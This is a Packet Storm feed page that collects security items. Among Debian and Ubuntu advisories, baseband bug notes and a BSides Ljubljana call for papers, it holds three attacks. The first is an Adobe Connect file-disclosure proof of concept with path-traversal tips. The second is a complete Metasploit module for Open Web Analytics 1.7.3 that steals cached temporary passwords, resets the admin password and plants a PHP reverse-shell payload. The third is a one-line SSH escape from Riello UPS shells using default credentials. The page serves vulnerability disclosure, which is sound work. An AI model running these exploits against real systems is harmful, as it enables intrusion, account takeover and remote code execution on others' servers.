Adobe Connect versions 11.4.5 and below as well as versions 12.1.5 and below suffer from a file disclosure vulnerability.

    # Title: adobe connect - Local File Disclosure / Download [security featurebypass vulnerability]# Author: h4shur# date:2021.01.16-2023.02.17# CVE: CVE-2023-22232# Vendor Homepage: https://www.adobe.com# Software Link: https://www.adobe.com/products/adobeconnect.html# Version: 11.4.5 and earlier, 12.1.5 and earlier# User interaction: None# Tested on: Windows 10 & Google Chrome, kali linux & firefox### Summary:Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) areaffected by an Improper Access Control vulnerability that could result in aSecurity feature bypass. An attacker could leverage this vulnerability toimpact the integrity of a minor feature.Exploitation of this issue does not require user interaction.### Description :There are many web applications in the world, each of which hasvulnerabilities due to developer errors, and this is a problem for all ofthem, and even the best of them, like the "adobe connect" program, havevulnerabilities that occur every month. They are found and fixed by theteam.* What is LFD bug?LFD bug stands for Local File Disclosure / Download, which generally allowsthe attacker to read and download files within the server, so it can beconsidered a very dangerous bug in the web world and programmers must beaware of it. Be careful and maintain security against this bug* Intruder access level with LFD bugThe level of access using this bug can be even increased to the level ofaccess to the website database in such a way that the hacker readssensitive files inside the server that contain database entry informationand enters the database and by extracting the information The admin willhave a high level of access* Identify vulnerable sitesTo search for LFD bugs, you should check the site inputs. If there is noproblem with receiving ./ characters, you can do the test to read the filesinside the server if they are vulnerable. Enter it and see if it is read ornot, or you can use files inside the server such as / etc / passwd / .. andstep by step using ../ to return to the previous path to find the passwdfile* And this time the "lfd" in "adobe connect" bug:To download and exploit files, you must type the file path in the"download-url" variable and the file name and extension in the "name"variable.You can download the file by writing the file path and file name andextension.When you have written the file path, file name and extension in the siteaddress variables, a download page from Adobe Connect will open for you,with "Save to My Computerfile name]" written in the download box and a file download link at thebottom of the download box, so you can download the file.* There are values inside the url that do not allow a file other than thisfile to be downloaded.* Values: sco_id and ticketsBut if these values are cleared, you will see that reloading is possiblewithout any obstaclesAt another address, you can download multiple files as a zip file.We put the address of the files in front of the variable "ffn" and if wewant to add the file, we add the variable "ffn" again and put the addressof the file in front of it. The "download_type" variable is also used tospecify the zip extension.### POC :https://target.com/[folder]/download?download-url=[URL]&name=[file.type]https://target.com/[folder]/download?output=output&download_type=[Suffix]&ffn=[URL]&baseContentUrl=[basefile folder]### References:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22232https://nvd.nist.gov/vuln/detail/CVE-2023-22232https://helpx.adobe.com/security/products/connect/apsb23-05.html

Adobe Connect 11.4.5 / 12.1.5 Local File Disclosure

Open Web Analytics (OWA) versions prior to 1.7.4 allow an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes.

    class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::FileDropper  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Open Web Analytics 1.7.3 - Remote Code Execution (RCE)',        'Description' => %q{          Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive          user information, which can be used to gain admin privileges by leveraging cache hashes.          This occurs because files generated with '<?php (instead of the intended "<?php sequence) aren't handled          by the PHP interpreter.        },        'Author' => [          'Jacob Ebben',    # ExploitDB Exploit Author          'Dennis Pfleger'  # Msf Module        ],        'References' => [          [ 'CVE', '2022-24637'],          [ 'EDB', '51026'],          [ 'URL', 'https://devel0pment.de/?p=2494' ]        ],        'Licence' => MSF_LICENSE,        'Platform' => ['php'],        'DefaultOptions' => {          'PAYLOAD' => 'php/meterpreter/reverse_tcp'        },        'Targets' => [ ['Automatic', {}] ],        'DisclosureDate' => '2022-03-18',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [            ARTIFACTS_ON_DISK, # /owa-data/caches/{get_random_string(8)}.php            IOC_IN_LOGS, # Malicious GET/POST requests in the webservice logs            ACCOUNT_LOCKOUTS, # Account passwords will be changed in this module            CONFIG_CHANGES, # Will update config files to trigger the exploit          ]        }      )    )    register_options([      OptString.new('Username', [ true, 'Target username', 'admin' ]),      OptString.new('Password', [ true, 'Target new password', 'pwned' ]),    ])    register_advanced_options([      OptInt.new('SearchLimit', [ false, 'Upper limit of user ids to check for usable cache file', 100 ]),      OptBool.new('DefangedMode', [ true, 'Run in defanged mode', true ])    ])  end  def check    res = check_connection    return CheckCode::Unknown('Connection failed') unless res    return CheckCode::Safe if !res.body.include?('Open Web Analytics')    version = Rex::Version.new(res.body.scan(/version=([\d.]+)/).flatten.first)    return CheckCode::Detected("Open Web Analytics #{version} detected") unless version < Rex::Version.new('1.7.4')    CheckCode::Appears("Open Web Analytics #{version} is vulnerable")  end  def exploit    if datastore['DefangedMode']      warning = <<~EOF        Are you SURE you want to execute the exploit against the target system?        Running this exploit will change user passwords and config files of the        target system.        Disable the DefangedMode option if you have authorization to proceed.      EOF      fail_with(Failure::BadConfig, warning)    end    username = datastore['Username']    new_password = datastore['Password']    res = check_connection    if res      print_good("Connected to #{full_uri} successfully!")    end    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.loginForm'),      'keep_cookies' => true,      'vars_post' => {        'owa_user_id' => username,        'owa_password' => rand_text_alphanumeric(8),        'owa_action' => 'base.login'      }    )    if res && res.code != 200      fail_with(Failure::UnexpectedReply, 'An error occurred during the login attempt!')    end    print_status("Attempting to find cache of '#{username}' user")    found = false    cache = nil    limit = datastore['SearchLimit']    if limit < 0      fail_with(Failure::BadConfig, 'SearchLimit must be set to a number > 0!')    end    limit.times do |key|      user_id = "user_id#{key}"      userid_hash = Digest::MD5.hexdigest(user_id)      filename = "#{userid_hash}.php"      cache_request = send_request_cgi(        'method' => 'GET',        'uri' => normalize_uri(target_uri.path, "/owa-data/caches/#{key}/owa_user/#{filename}")      )      if cache_request && cache_request.code == 404        next      end      cache_raw = cache_request.body      cache = get_cache_content(cache_raw)      cache_username = get_cache_username(cache)      if cache_username != username        print_status("The temporary password for a different user was found. \"#{cache_username}\": #{get_cache_temppass(cache)}")        next      else        found = true        break      end    end    if !found      fail_with(Failure::NotFound, "No cache found. Are you sure \"#{username}\" is a valid user?")    end    cache_temppass = get_cache_temppass(cache)    print_good("Found temporary password for user '#{username}': #{cache_temppass}")    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.usersPasswordEntry'),      'keep_cookies' => true,      'vars_post' => {        'owa_password' => new_password,        'owa_password2' => new_password,        'owa_k' => cache_temppass,        'owa_action' => 'base.usersChangePassword'      }    )    if res && res.code != 302      fail_with(Failure::UnexpectedReply, 'An error occurred when changing the user password!')    end    print_good("Changed the password of '#{username}' to '#{new_password}'")    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.loginForm'),      'keep_cookies' => true,      'vars_post' => {        'owa_user_id' => username,        'owa_password' => new_password,        'owa_action' => 'base.login'      }    )    redirect = res['location']    res = send_request_cgi(      'method' => 'GET',      'uri' => URI(redirect).path    )    if res && res.code == 200      print_good("Logged in as #{username} user")    else      fail_with(Failure::UnexpectedReply, "An error occurred during the login attempt of user #{username}")    end    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.optionsGeneral')    )    shell_filename = "#{rand_text_alphanumeric(8)}.php"    nonce = get_update_nonce(res)    log_location = 'owa-data/caches/' + shell_filename    register_file_for_cleanup(shell_filename)    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.optionsGeneral'),      'keep_cookies' => true,      'vars_post' => {        'owa_nonce' => nonce,        'owa_action' => 'base.optionsUpdate',        'owa_config[base.error_log_file]' => log_location,        'owa_config[base.error_log_level]' => 2      }    )    fail_with(Failure::Unreachable, 'An error occurred when attempting to update config!') unless res && res.code == 302    print_status('Creating log file')    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.optionsGeneral'),      'keep_cookies' => true,      'vars_post' => {        'owa_nonce' => nonce,        'owa_action' => 'base.optionsUpdate',        'owa_config[shell]' => payload.encoded + '?>'      }    )    fail_with(Failure::Unknown, 'An error occurred when attempting to update config!') unless res && res.code == 302    print_good('Wrote payload to file')    send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, "/owa-data/caches/#{shell_filename}"),      timeout: 1    )    print_good('Triggering payload! Check your listener!')  end  def check_connection    send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.loginForm')    )  end  def get_cache_content(cache_raw)    regex_cache_base64 = /\*(\w*={0,2})/    regex_result = cache_raw.match(regex_cache_base64)    unless regex_result      fail_with(Failure::NotVulnerable, 'The serialized data can not be extracted from the cache file!')    end    Base64.decode64(regex_result[1]).force_encoding('ascii')  end  def get_cache_username(cache)    match = cache.match(/"user_id";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:5:"(\w*)"/)    unless match      fail_with(Failure::NotVulnerable, 'The username can not be extracted from the cache file!')    end    match[1]  end  def get_cache_temppass(cache)    match = cache.match(/"temp_passkey";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:32:"(\w*)"/)    unless match      fail_with(Failure::NotVulnerable, 'The temp_passkey variable can not be extracted from the cache file!')    end    match[1]  end  def get_update_nonce(page)    update_nonce = page.body.match(/owa_nonce" value="(\w*)"/)[1]    unless update_nonce      fail_with(Failure::NotVulnerable, 'The update_nonce variable can not be extracted from the page body!')    end    update_nonce  endend

Open Web Analytics 1.7.3 Remote Code Execution

Debian Linux Security Advisory 5356-2 - One of the security fixes released as DSA 5356 introduced a regression in the processing of specific WAV files. Updated sox packages are available to correct this issue.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5356-2                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
March 17, 2023                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : sox  
Debian Bug     : 1032082

One of the security fixes released as DSA 5356 introduced a regression  
in the processing of specific WAV files. Updated sox packages are  
available to correct this issue.

For the stable distribution (bullseye), these problems have been fixed in  
version 14.4.2+git20190427-2+deb11u2.

We recommend that you upgrade your sox packages.

For the detailed security status of sox please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/sox

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmQUMm8ACgkQEMKTtsN8  
TjYYsg//XGLbPaqdK9+2GQ15x5zURtUo9LQs5osUuuURA4dn4+wsA8C2z4QlppII  
NYCw3mpVAdjePYey55WSg7b9ZhO4QEIidb1oofMDsgJ5xhosH3Pl495Ysi/8RYyz  
o0eCsKlXfNP+pz72HhULOgaYA3gwb0os2BSRrT/o1ArwZu3FN6rlygBnVY2NxUAC  
4ZuXSb8dnI6TnmHcIc4/pzUgW3J6SpKdziFzkdVl1oRkWz68NpYbR715HaY4wpx8  
G16ElwoDyMQMQCXxa208AVifeG/stx9MGA86rN5X9VL1U1uiou9DCjjqklH8Z53j  
xpsf+i1kyGXaAaZyZyeg0AyeCa+Ve+6zrtfLQkT/1ZuoP+SyDT3yOTr0hl1/QxEf  
id8HgOcaKMUlDrZz3AZQnAcRWsnH6VDMhbPN2dm9npHtZeKbZoPRkxMg1bsSuFue  
wjzs45+kq2sl4PTZDHfzxvwEiy8/afhv+6t73AtsemZCL5X+kR157GYztbGy3Hp8  
oxIbyjnZ8qid95Tg4Cqpta07CusCOkk7+hdZ02YipLol0Ib4mib9HlH/SysXpmMQ  
x6EwXz5TCpOcg+6Z8DtmmnyKjcDwxHUcgOg3iscsMrkW6RAmZrqAEBf8RWhOlnxP  
ZhPoD2MRe5pd9Ml8xnQPiPjaFg6Skv7Gz6wC0Uis8m6OsnMKA/U=  
=06P7  
-----END PGP SIGNATURE-----

Debian Security Advisory 5356-2

There is an intra-object overflow in Shannon Baseband, inside the 5G MM protocol implementation (NrmmMsgCodec as it is called in Shannon according to debug strings), specifically when handling the Service Area List message (IEI = 0x27).

Shannon Baseband NrmmMsgCodec Intra-Object Overflow

Ubuntu Security Notice 5959-1 - It was discovered that Kerberos incorrectly handled memory when processing KDC data, which could lead to a NULL pointer dereference. An attacker could possibly use this issue to cause a denial of service or have other unspecified impacts.

    ==========================================================================Ubuntu Security Notice USN-5959-1March 16, 2023krb5 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in Kerberos.Software Description:- krb5: MIT Kerberos Network Authentication ProtocolDetails:It was discovered that Kerberos incorrectly handled memory when processingKDC data, which could lead to a NULL pointer dereference. An attacker couldpossibly use this issue to cause a denial of service or have otherunspecified impacts. (CVE-2021-36222, CVE-2021-37750)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  krb5-k5tls                      1.17-6ubuntu4.3  krb5-kdc                        1.17-6ubuntu4.3  krb5-kdc-ldap                   1.17-6ubuntu4.3  krb5-pkinit                     1.17-6ubuntu4.3Ubuntu 18.04 LTS:  krb5-k5tls                      1.16-2ubuntu0.4  krb5-kdc                        1.16-2ubuntu0.4  krb5-kdc-ldap                   1.16-2ubuntu0.4  krb5-pkinit                     1.16-2ubuntu0.4In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5959-1  CVE-2021-36222, CVE-2021-37750Package Information:  https://launchpad.net/ubuntu/+source/krb5/1.17-6ubuntu4.3  https://launchpad.net/ubuntu/+source/krb5/1.16-2ubuntu0.4

Ubuntu Security Notice USN-5959-1

Riello UPS systems can have their restricted configuration shell bypassed to gain full underlying operating system access.

    I. VULNERABILITY-------------------------Riello UPS systems allow to easily escape the configuration shell and get access to the operating systemII. VENDOR-------------------------Riello (https://www.riello-ups.es/)III. DESCRIPTION-------------------------Riello UPS systems allow SSH access to configure the device, sometimes with the default credentials "admin:admin".Using the "-t bash" or "-t /bin/bash" paramters it is possible to escape the restricted shell and get access to the operating system:ssh admin@x.x.x.x -t bash

Riello UPS Restricted Shell Bypass

Ubuntu Security Notice 5962-1 - It was discovered that the Upper Level Protocol subsystem in the Linux kernel did not properly handle sockets entering the LISTEN state in certain protocols, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Davide Ornaghi discovered that the netfilter subsystem in the Linux kernel did not properly handle VLAN headers in some situations. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5962-1  
March 16, 2023

linux-intel-iotg vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-intel-iotg: Linux kernel for Intel IoT platforms

Details:

It was discovered that the Upper Level Protocol (ULP) subsystem in the  
Linux kernel did not properly handle sockets entering the LISTEN state in  
certain protocols, leading to a use-after-free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2023-0461)

Davide Ornaghi discovered that the netfilter subsystem in the Linux kernel  
did not properly handle VLAN headers in some situations. A local attacker  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2023-0179)

It was discovered that the NVMe driver in the Linux kernel did not properly  
handle reset events in some situations. A local attacker could use this to  
cause a denial of service (system crash). (CVE-2022-3169)

Maxim Levitsky discovered that the KVM nested virtualization (SVM)  
implementation for AMD processors in the Linux kernel did not properly  
handle nested shutdown execution. An attacker in a guest vm could use this  
to cause a denial of service (host kernel crash) (CVE-2022-3344)

Gwangun Jung discovered a race condition in the IPv4 implementation in the  
Linux kernel when deleting multipath routes, resulting in an out-of-bounds  
read. An attacker could use this to cause a denial of service (system  
crash) or possibly expose sensitive information (kernel memory).  
(CVE-2022-3435)

It was discovered that a race condition existed in the Kernel Connection  
Multiplexor (KCM) socket implementation in the Linux kernel when releasing  
sockets in certain situations. A local attacker could use this to cause a  
denial of service (system crash). (CVE-2022-3521)

It was discovered that the Netronome Ethernet driver in the Linux kernel  
contained a use-after-free vulnerability. A local attacker could use this  
to cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2022-3545)

It was discovered that the Intel i915 graphics driver in the Linux kernel  
did not perform a GPU TLB flush in some situations. A local attacker could  
use this to cause a denial of service or possibly execute arbitrary code.  
(CVE-2022-4139)

It was discovered that a race condition existed in the Xen network backend  
driver in the Linux kernel when handling dropped packets in certain  
circumstances. An attacker could use this to cause a denial of service  
(kernel deadlock). (CVE-2022-42328, CVE-2022-42329)

It was discovered that the NFSD implementation in the Linux kernel  
contained a use-after-free vulnerability. A remote attacker could possibly  
use this to cause a denial of service (system crash) or execute arbitrary  
code. (CVE-2022-4379)

It was discovered that a race condition existed in the x86 KVM subsystem  
implementation in the Linux kernel when nested virtualization and the TDP  
MMU are enabled. An attacker in a guest vm could use this to cause a denial  
of service (host OS crash). (CVE-2022-45869)

It was discovered that the Atmel WILC1000 driver in the Linux kernel did  
not properly validate the number of channels, leading to an out-of-bounds  
write vulnerability. An attacker could use this to cause a denial of  
service (system crash) or possibly execute arbitrary code. (CVE-2022-47518)

It was discovered that the Atmel WILC1000 driver in the Linux kernel did  
not properly validate specific attributes, leading to an out-of-bounds  
write vulnerability. An attacker could use this to cause a denial of  
service (system crash) or possibly execute arbitrary code. (CVE-2022-47519)

It was discovered that the Atmel WILC1000 driver in the Linux kernel did  
not properly validate offsets, leading to an out-of-bounds read  
vulnerability. An attacker could use this to cause a denial of service  
(system crash). (CVE-2022-47520)

It was discovered that the Atmel WILC1000 driver in the Linux kernel did  
not properly validate specific attributes, leading to a heap-based buffer  
overflow. An attacker could use this to cause a denial of service (system  
crash) or possibly execute arbitrary code. (CVE-2022-47521)

Lin Ma discovered a race condition in the io_uring subsystem in the Linux  
kernel, leading to a null pointer dereference vulnerability. A local  
attacker could use this to cause a denial of service (system crash).  
(CVE-2023-0468)

It was discovered that the file system writeback functionality in the Linux  
kernel contained a user-after-free vulnerability. A local attacker could  
possibly use this to cause a denial of service (system crash) or execute  
arbitrary code. (CVE-2023-26605)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1026-intel-iotg  5.15.0-1026.31  
   linux-image-intel-iotg          5.15.0.1026.25

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5962-1  
   CVE-2022-3169, CVE-2022-3344, CVE-2022-3435, CVE-2022-3521,  
   CVE-2022-3545, CVE-2022-4139, CVE-2022-42328, CVE-2022-42329,  
   CVE-2022-4379, CVE-2022-45869, CVE-2022-47518, CVE-2022-47519,  
   CVE-2022-47520, CVE-2022-47521, CVE-2023-0179, CVE-2023-0461,  
   CVE-2023-0468, CVE-2023-26605

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-intel-iotg/5.15.0-1026.31

Ubuntu Security Notice USN-5962-1

There is a heap buffer overflow in Shannon Baseband, inside the 5G MM protocol implementation (NrmmMsgCodec as it is called in Shannon according to debug strings), specifically when handling the Operator-defined access category definitions message (IEI = 0x76).

Shannon Baseband NrmmMsgCodec Access Category Definitions Heap Buffer Overflow

B-Sides Ljubljana will be held June 16, 2023 in Ljubljana, Slovenia.

    MMMMMMMMMMMMMMMMNmddmNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMN..-..--+MMNy:...-.-/yNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMy..ymd-.:Mm::-:osyo-..-mMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM:..---.:dM/..+NNyyMN/..:MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm../dds.-oy.-.dMh--mMds++MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMy:::::/ydMmo..-hMMMmo//omMs/+Mm+++++shNMN+//+//+oMNy+///ohMMMMs//yMNo+hMh---m:-:hy+sMN..+Mo..os+.-:Ny--ossssdN-.:yyo+mMMMMo..oMNo/hMo..-m:..-:+hMy--dN-./MMMo.-d/..::::sMN:..-:+hMMMMMN:../yddy:...hyymdh:..m:--Mh--yNms--om--+ddddNMmymdy:..mMMMMMMy/....---omd:-.--.:hd..oM/....-:+dMs--::--.ym:..--.:yMMMMMMMMMMmdddNMMMMMMmmmNMMNmmNMNmmmmMMMMMNmmmmmNmMMMNmdmNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM+.LJUBLJANA..0x7E4.+MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM-=[ BSidesLjubljana Event info ]=-=-=-=-=-=-=-=-=-=-=-=-=-=- BSidesLjubljana - <https://bsidesljubljana.si>Date: June 16, 2023Venue: C111, Ljubljana, Slovenia, Europe  CFP URL: https://0x7e7.bsidesljubljana.si/cfp/Email: cfp[at]bsidesljubljana[dot]siTwitter: @BSidesLjubljanaTwitter hashtag: #BSidesLjubljana-=[ CALL FOR PAPERS ]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-We are looking for speakers, sponsors and everyone in between!Topics of interest include (but are in no way limited to) the following, preference is given to talks that actually providesolutions as well as insight to problems: [*] Offensive and Defensive Technologies and Techniques [*] Bugs and Reverse Engineering (finding and fixing) [*] Incident Handling, Forensics and Anti-Forensics [*] Virtualisation, Container, and Cloud Computing Security [*] Owning the Enterprise, Infrastructure, Applications,      Databases and Client-side security [*] Cryptography, Cryptocurrencies, Cryptozoology and other      Crypto-fu [*] Embedded/Hardware Hacking and the Internet of Shit(tm) [*] Application and Mobile Security [*] Networking, Comms, Critical National Infrastructure (CNI) [*] Human hacking / Social engineering [*] Cyberspace, Policing, Law, Interception, and Human Rights(If it is not on the list but want to submit anyway, pleasedo so and we’ll be glad to consider it!)Please submit entries via: <https://0x7e7.bsidesljubljana.si/cfp-form/>-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- We are planning several participation formats. The terms and conditions are described below:#1. 40 minutes talkThe speaker is granted 40 minutes to present his/her paper and 10 minutes to answer the questions from the audience. Talks will be held in two tracks in separate halls at the venue.#2. 20-minutes talksThe speaker is granted 20 minutes to present his/her paper and 10 minutes to answer the questions from the audience. Talks will be held in two tracks in separate halls at the venue.#3. WorkshopsThe speaker prepares his/her presentation and any training materials he/she needs. He/she is granted 2 or more hours to conduct the master class in a separate hall/room.#4. Lightning talksThe speaker is granted 7 minutes (that includes HW preparation for slides, if there are any, as well as Q&A)to present his/her paper in the main venue hall. NOTE: For this type of format, you register your talk at the event. Please submit your talk/workshop proposals via <https://0x7e7.bsidesljubljana.si/cfp-form/>We do not accept marketing and non-technical commercial papers!The accepted language is English.We can’t wait to see your ideas!-=[ TIMELINE ]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [*] 2023 March     6th: CFP Open [*] 2023 April    30th: CFP Deadline [*] 2023 May       7th: Acceptance Notification [*] 2023 June     16th: \o/ BSides Ljubljana 0x7E7 \o/   -=[ Are you interested in sponsoring us? ]=-=-=-=-=-=-=-=-=-=BSides Ljubljana is a non-profit community driven event, and relies on the kind sponsorship of people and companies like you to succeed. If you want to support the initiative and gain visibility by sponsoring, please contact us by writing an e-mail to 'sponsorship [at] bsidesljubljana.si'.More at <https://0x7e7.bsidesljubljana.si/sponsors/>If you have any questions, please certainly feel free  to contact me directly.  Thanks!  [1] https://0x7e7.bsidesljubljana.si/archives/[2] https://bsidesljubljana.si/[3] https://0x7e7.bsidesljubljana.si/cfp/[4] https://0x7e7.bsidesljubljana.si/cfp-form/

BSidesLjubljana 2023 Call For Papers

Debian Linux Security Advisory 5375-1 - Multiple security issues were discovered in Thunderbird, which could result in denial of service, the execution of arbitrary code or spoofing.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5375-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMarch 17, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : thunderbirdCVE ID         : CVE-2023-25751 CVE-2023-25752 CVE-2023-28162 CVE-2023-28164                  CVE-2023-28176Multiple security issues were discovered in Thunderbird, which couldresult in denial of service, the execution of arbitrary code orspoofing.For the stable distribution (bullseye), these problems have been fixed inversion 1:102.9.0-1~deb11u1.We recommend that you upgrade your thunderbird packages.For the detailed security status of thunderbird please refer toits security tracker page at:https://security-tracker.debian.org/tracker/thunderbirdFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmQUMlYACgkQEMKTtsN8TjbFuRAAu5eB/iJm7+hwpVvqGITNNMkHe7OvnnNRnJ85Ot2Om74+8Q8vorj8VeyeROk2N8KHBiehQha1sNSq6SAZ4qaSXJFkQOlm6vH/MSlsf9wGQ5apmpmQAPZ9V0F1KgcOqtdq+lwd9DTXlcXPARumDLdkd8NrashhIvqJGaDFBqWoJOqp7NJHqvNPQzbLinKqn30cDYcSUzVCdWCOxnrVGLrwTwLWvNCyslBZmTmNg1nKViqisLp59tscrchVLw0cJnVBQBA+BH3PdF6hzL2d9ilzT4cYgoVnqbAoyLCuKQMRlRpV6vk4Qguv5lMWo7Gjc9bIoWoRMDNyt4PhmEcjJQLUpv+7lR3qv51b2J9Ga4pCsUJZ/my2ZFC/xysnNsm8KRXNIk8ZQvdkYL6RHuphdXmHAzjhyLy9/PLvAc1rVtOz9Niu/d/a0ipkyH+uzEH/zcinFJFoGOOit2vx6lfrg+41E+EJKXw34oFq+TBlLc7a0kQn+OJEAoC0tMsUzPvxdOfbVy9KCkXPSbCrqf6xpNKTJeKBcRUK6GSyvUL6T3AWXb26lNbRL6uo10j0gl1E7clYqlv4qK+zVz1h9EtYeNdJcUnJxMypFhpHD8+BO2VvH4EZ4gpzZcAWDWk/xBgLrxQ0uiJI43LKCrgMXAbotd0w2McPKOAdLH0Yq+lUJZ6tVIs==Mv0t-----END PGP SIGNATURE-----

Source

Packet Storm